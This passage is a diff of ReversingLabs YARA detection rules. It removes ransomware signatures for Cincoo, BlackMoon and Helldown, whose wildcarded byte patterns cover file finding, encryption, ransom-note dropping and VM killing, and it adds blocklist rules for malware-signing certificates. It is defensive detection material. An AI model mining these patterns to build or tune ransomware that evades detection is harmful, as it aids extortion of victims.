 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cincoo"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D
-            ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84
-            ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ??
-            ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
-            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ??
-            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8 ?? ??
-            ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ?? 85 C0
-            75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 EC ?? 8B 45 ?? 53 8B D9 89 45 ?? B9 ?? ?? ?? ?? 8B C1 56 8B 53 ?? 2B C2
-            8B 75 ?? 89 55 ?? 57 3B C6 0F 82 ?? ?? ?? ?? 8B 7B ?? 8D 04 32 8B F0 89 45 ?? 83 CE
-            ?? 89 7D ?? 3B F1 76 ?? 8B F1 EB ?? 8B C7 D1 E8 2B C8 3B F9 76 ?? BE ?? ?? ?? ?? EB
-            ?? 03 C7 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 81 F9 ?? ?? ?? ??
-            72 ?? 8D 41 ?? 3B C1 0F 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B 55 ?? 8D 78 ?? 83 E7 ?? 89 47 ?? EB ?? 85 C9 74 ?? 51 E8 ?? ?? ?? ?? 8B 55
-            ?? 83 C4 ?? 8B F8 EB ?? 33 FF 8B 45 ?? 89 43 ?? 8B 45 ?? 89 73 ?? 8D 34 3A 03 C6 83
-            7D ?? ?? 89 45 ?? 52 72 ?? 8B 33 56 57 E8 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF 75 ?? 03
-            C7 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 41 C6 00 ?? 81 F9 ?? ?? ?? ?? 72 ??
-            8B 56 ?? 83 C1 ?? 2B F2 8D 46 ?? 83 F8 ?? 77 ?? 8B F2 51 56 E8 ?? ?? ?? ?? 83 C4 ??
-            89 3B 8B C3 5F 5E 5B 8B E5 5D C2 ?? ?? 53 57 E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 56 E8
-            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C6 00 ?? 8B C3 89 3B 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC CC CC 56 8B F1 FF 76 ?? E8 ?? ?? ?? ?? 8B
-            4E ?? 83 F9 ?? 72 ?? 8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83
-            C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ??
-            ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 66 89 06 5E C3 E8 ?? ?? ?? ?? CC CC CC CC CC CC
-            8B 09 85 C9 74 ?? 8B 01 6A ?? FF 10 C3
-        }
-		$drop_ransom_note = {
-            52 51 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 8D 4D ?? C6 46 ?? ??
-            E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D
-            4E ?? 50 E8 ?? ?? ?? ?? 81 CF ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ??
-            ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 83 F8 ??
-            72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D
-            04 0E 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 44 30 ?? ?? 8D 85 ?? ?? ?? ??
-            EB
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV Intalev Ukraina" and ( pe.signatures [ i ] . serial == "00:e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" or pe.signatures [ i ] . serial == "e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" ) and 1464220800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Effc6D19D6Fc85872E4E5B3Ccee6D301 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "56114e31-2e9b-5d16-8435-708bbb2687cc"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12856-L12874"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a746c4193f1264cb96eae0ea85c2c76b5caf3b72ca950f76af426b4d68d210b3"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C\\xC3\\x93IR IP LIMITED" and ( pe.signatures [ i ] . serial == "00:ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" or pe.signatures [ i ] . serial == "ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" ) and 1572307200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Blackmoon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2F4A25D52B16Eb4C9Dfe71Ebbd8121Bb : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlackMoon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "95ebb6c4-b0c9-5f9a-8424-a2f4d33953eb"
-		date = "2020-11-11"
-		modified = "2020-11-11"
+		id = "1afd5d2b-fd6d-58ca-b966-788d465cd0ed"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BlackMoon.yara#L1-L70"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "428409096a8637978bf2a1efb3238e4ba87715a909693b0cd26c0f689d567a09"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12876-L12892"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7b237ae0574afeafcc05f71512c09d3170edbee20e512a1b0af5b431923dc25c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlackMoon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            81 EC ?? ?? ?? ?? 53 8B 9C 24 ?? ?? ?? ?? 55 56 8B 33 57 8B BC 24 ?? ?? ?? ?? 33 ED
-            85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 76 ?? 85 F6 74 ?? 83 FE ?? 74 ?? 56 FF
-            15 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 89 33 74 ?? 8B 84
-            24 ?? ?? ?? ?? 85 C0 74 ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 74 ?? EB ?? 8B 94 24 ?? ??
-            ?? ?? 8B 44 24 ?? 85 C2 74 ?? BD ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 74 ?? 85 ED 75 ??
-            8B 84 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 8D 44 24 ?? 50 56 74 ?? FF D7 85 C0 74
-            ?? 8B 4C 24 ?? 83 E1 ?? 80 F9 ?? 75 ?? 8D 54 24 ?? 52 56 FF D7 85 C0 75 ?? 5F 5E 5D
-            33 C0 5B 81 C4 ?? ?? ?? ?? C3 FF D7 85 C0 74 ?? 8B 9C 24 ?? ?? ?? ?? 85 5C 24 ?? 75
-            ?? 8D 4C 24 ?? 51 56 FF D7 85 C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 8D 54 24 ??
-            52 E8 ?? ?? ?? ?? 40 50 E8 ?? ?? ?? ?? 8B D0 8D 7C 24 ?? 83 C9 ?? 33 C0 83 C4 ?? F2
-            AE F7 D1 2B F9 8B C1 8B F7 8B FA C1 E9 ?? F3 A5 8B C8 8B C2 83 E1 ?? F3 A4 5F 5E 5D
-            5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ??
-            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? DB
-            45 ?? DD 5D ?? DD 45 ?? DB 45 ?? DD 5D ?? DC 65 ?? DD 5D ?? DD 45 ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B
-            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D
-            ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p2 = {
-            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89
-            45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
-            8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ??
-            ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A
-            ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ??
-            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85
-            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Blist LLC" and pe.signatures [ i ] . serial == "2f:4a:25:d5:2b:16:eb:4c:9d:fe:71:eb:bd:81:21:bb" and 1629763200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6889Aab6202Bcc5F11Caedf4D04F435B : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d4499a1d-aa8d-5056-ad91-439f27f00c33"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12894-L12910"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b2261ed8001929be8f80f73cc0c5076138f4794c73cbffd63773da5fc44639a8"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C4DL Media" and pe.signatures [ i ] . serial == "68:89:aa:b6:20:2b:cc:5f:11:ca:ed:f4:d0:4f:43:5b" and 1231891200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Helldown : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3Be63083Fbb1787B445Da97583721419 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Helldown ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aca11cf1-2d73-5599-8027-a52b9dcd4757"
-		date = "2025-01-20"
-		modified = "2025-01-20"
+		id = "6839595d-b645-5963-bd96-a668bfdd667f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Linux.Ransomware.Helldown.yara#L1-L127"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b5572f537c87d113886d79768cfe89e46c00063333de612a4547c9a80f5826e1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12912-L12928"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f39f5a632544bc01c3b4c9e2f2dd33f7109c44375f54011a34181e10da79debc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Helldown"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            41 56 41 55 41 54 49 89 FC 55 53 0F 1F 44 00 ?? 49 8B 74 24 ?? 49 8B 3C 24 E8 ?? ??
-            ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8B 38 E8 ?? ?? ?? ?? 48 85 C0 48 89 C3
-            0F 84 ?? ?? ?? ?? 66 90 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 89 C6 0F 84 ?? ?? ?? ??
-            0F B6 40 ?? 3C ?? 0F 84 ?? ?? ?? ?? 3C ?? 75 ?? 49 83 C6 ?? 4C 89 F7 E8 ?? ?? ?? ??
-            85 C0 74 ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 4C 89 F7 49 89 C5 E8 ?? ?? ?? ?? 49 8D 7C 05
-            ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 49 89 C5 48 89 C7 E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ??
-            ?? 4C 89 F6 4C 89 EF 66 41 C7 44 05 ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ??
-            4C 89 EF 49 89 C6 E8 ?? ?? ?? ?? 49 8B 54 24 ?? 49 8B 7C 24 ?? 48 89 C6 4C 89 70 ??
-            E8 ?? ?? ?? ?? 49 8B 7C 24 ?? E8 ?? ?? ?? ?? 4D 85 ED 0F 84 ?? ?? ?? ?? 4C 89 EF E8
-            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 89 C6 0F 85 ?? ?? ?? ?? 0F 1F 40 ??
-            48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 41 80 7E ??
-            ?? 0F 84 ?? ?? ?? ?? 48 8B 7D ?? 49 83 C6 ?? E8 ?? ?? ?? ?? 4C 89 F7 49 89 C5 E8 ??
-            ?? ?? ?? 49 8D 7C 05 ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 49 89 C5 48 89 C7 E8 ?? ?? ?? ??
-            4C 89 EF E8 ?? ?? ?? ?? 4C 89 F6 4C 89 EF 66 41 C7 44 05 ?? ?? ?? E8 ?? ?? ?? ?? 4C
-            89 EF E8 ?? ?? ?? ?? 4D 85 ED 49 89 C6 74 ?? 4C 89 EF E8 ?? ?? ?? ?? 49 8B 54 24 ??
-            49 8B 3C 24 4C 89 F6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 5B 5D 41 5C 41 5D 41 5E
-            C3
-        }
-		$encrypt_files_p1 = {
-            41 57 48 89 F8 41 56 41 55 41 54 55 53 48 83 EC ?? 48 89 7C 24 ?? 66 2E 0F 1F 84 00
-            ?? ?? 00 00 48 8B 78 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 72 ?? 48 8B 7A ?? E8 ??
-            ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 48 8B 30 4C 8B 68 ?? 48 85 F6 0F
-            84 ?? ?? ?? ?? 48 89 F7 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48
-            89 44 24 ?? 48 89 C7 31 C0 E8 ?? ?? ?? ?? 85 C0 89 C3 0F 88 ?? ?? ?? ?? 49 81 FD ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 41 BF ?? ?? ?? ?? 44 0F 4C F8 BA ?? ?? ?? ?? 49 8D 85 ?? ??
-            ?? ?? BD ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 4C EA B2 ?? 44 0F 4C E2
-            48 3D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 0F 46 EA 44 0F 46 FA 44 0F 46 E0
-            BA ?? ?? ?? ?? 49 81 FD ?? ?? ?? ?? B8 ?? ?? ?? ?? 45 0F 4E E5 48 0F 4E EA 44 0F 4E
-            F8 E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 45 89 E4 48 89 C7 BE ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 4C 89
-        }
-		$encrypt_files_p2 = {
-            EA 49 89 C4 4C 89 E8 48 C1 FA ?? 45 31 ED 48 F7 FD 31 ED 48 89 44 24 ?? 0F 1F 40 ??
-            31 D2 48 89 EE 89 DF E8 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 E6 89 DF 41 83 C5 ?? E8 ??
-            ?? ?? ?? 48 8B 7C 24 ?? 48 8D 54 24 ?? 31 C9 41 89 C1 4D 89 E0 BE ?? ?? ?? ?? 41 89
-            C6 E8 ?? ?? ?? ?? 31 D2 48 89 EE 89 DF E8 ?? ?? ?? ?? 44 89 F2 4C 89 E6 89 DF E8 ??
-            ?? ?? ?? 48 03 6C 24 ?? 45 39 EF 7F ?? 31 F6 BA ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48
-            8B 74 24 ?? BA ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 8B 7C 24 ??
-            E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 74 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 4D 85 E4 74 ??
-            4C 89 E7 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 74 ?? 48 8B
-            7C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 30 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ??
-            48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 8B 54 24
-            ?? 48 8B 32 EB ?? 66 0F 1F 44 00 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F
-        }
-		$drop_ransom_note = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 49 89 FC 48 83 EC ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 00 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? BE ?? ?? ??
-            ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 89 C7 48 8B 15 ?? ?? ?? ?? 48 89 C3 31 C0 E8
-            ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 89 DF 48 89 C5 E8 ?? ?? ?? ?? 4C 8D 6C 05 ??
-            31 ED 4D 85 ED 74 ?? 4C 89 EF E8 ?? ?? ?? ?? 4C 89 EA 31 F6 48 89 C7 48 89 C5 E8 ??
-            ?? ?? ?? 4C 89 E6 48 89 EF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48
-            89 DE 48 89 EF C6 40 ?? ?? E8 ?? ?? ?? ?? 31 F6 48 89 EF E8 ?? ?? ?? ?? 85 C0 75 ??
-            48 85 ED 74 ?? 48 89 EF E8 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 89 DF 48 8B 6C
-            24 ?? 48 8B 5C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? E9 ?? ?? ?? ?? 66 0F
-            1F 44 00 ?? 48 89 EF BA ?? ?? ?? ?? BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 3D ??
-            ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 31 C0 31 C9 BA ?? ?? ?? ?? 41 89 C4 48 89 FE E8 ?? ??
-            ?? ?? 48 8B 40 ?? 4C 8B 68 ?? 4C 89 EF E8 ?? ?? ?? ?? 44 89 E7 48 89 C2 4C 89 EE E8
-            ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 48 8B 5C 24
-            ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? C3
-        }
-		$kill_virtual_machines_p1 = {
-            41 57 31 C0 B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 89 FD 53 48 81 EC ?? ?? ?? ?? 48 89
-            E7 48 89 E3 F3 48 AB C6 07 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 F6 48
-            89 C7 49 89 C4 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 C1 BE ?? ?? ?? ?? 49 89 C5 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 41 BF ?? ?? ??
-            ?? EB ?? 90 83 FD ?? 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48
-            89 DF E8 ?? ?? ?? ?? 4C 89 F6 48 89 DF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 49 8D 7D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0
-            0F 84 ?? ?? ?? ?? 4C 8D 70 ?? BE ?? ?? ?? ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 89 DF C6 00
-            ?? 49 89 C5 4C 89 F9 31 C0 83 FD ?? F3 48 AB 48 8B 05 ?? ?? ?? ?? 48 89 03 48 8B 05
-            ?? ?? ?? ?? 48 89 43 ?? 48 8B 05 ?? ?? ?? ?? 48 89 43 ?? 8B 05 ?? ?? ?? ?? 89 43
-        }
-		$kill_virtual_machines_p2 = {
-            0F B7 05 ?? ?? ?? ?? 66 89 43 ?? 0F B6 05 ?? ?? ?? ?? 88 43 ?? 0F 85 ?? ?? ?? ?? 48
-            89 D9 8B 11 48 83 C1 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 C1
-            EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9 ?? C7 01 ?? ??
-            ?? ?? C6 41 ?? ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 48 89 D9 8B 11 48 83 C1 ?? 8D 82 ??
-            ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48
-            8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9 ?? C7 01 ?? ?? ?? ?? C6 41 ?? ?? E9 ?? ?? ?? ??
